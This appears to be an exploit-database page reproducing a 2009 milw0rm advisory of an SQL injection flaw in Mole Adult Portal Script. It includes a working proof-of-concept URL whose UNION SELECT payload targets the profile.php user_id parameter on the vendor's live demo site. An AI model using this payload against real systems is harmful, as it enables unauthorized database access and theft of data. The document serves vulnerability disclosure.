header-logo
Suggest Exploit
vendor:
Mole Adult Portal Script
by:
Qabandi
9
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Mole Adult Portal Script
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Mole Adult Portal Script – SQL Injection Vulnerability

Mole Adult Portal Script is prone to an SQL injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. An attacker can exploit this issue to manipulate SQL queries in the back-end database, allowing the attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation.

Mitigation:

Input validation should be used to ensure that untrusted data is not used to construct SQL queries in a way that would allow an attacker to modify the logic of the executed query.
Source

Exploit-DB raw data:

                  ||          ||   | ||
           o_,_7 _||  . _o_7 _|| q_|_||  o_w_,
          ( :   /    (_)    /           (   .


=By: 	Qabandi
=Email:	iqa[a]hotmail.fr

	From Kuwait PEACE

=Vuln:		Mole Adult Portal Script - SQL Injection Vulnerability
=INFO:		http://www.mole-group.com/scripts/scripts/adult-portal-escort-listing-script.html
=BUY:  		http://www.mole-group.com/scripts/scripts/payment.html
=DORK:		--

                                    -\18+/-
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@-SQL-Injection-PoC-@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Magic Quot. needs to be OFF

LIVE DEMO:
http://adult.mole-group.com/profile.php?user_id=-3%27%20UNION%20SELECT%201,unhex(hex(version())),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86/*

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-==-==-=-Te-=-Amo=-=-Vio-=-==-=-==-=-=-=-==-=-==-=-=-=-=-=-=
=-=-=-=-==-=-=-=-=-=-No--More---Private=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Salamz: Killer Hack, Mr.Mn7os, All muslim hackers.

# milw0rm.com [2009-05-26]

Navigation

Suggest Exploit

Services By CQR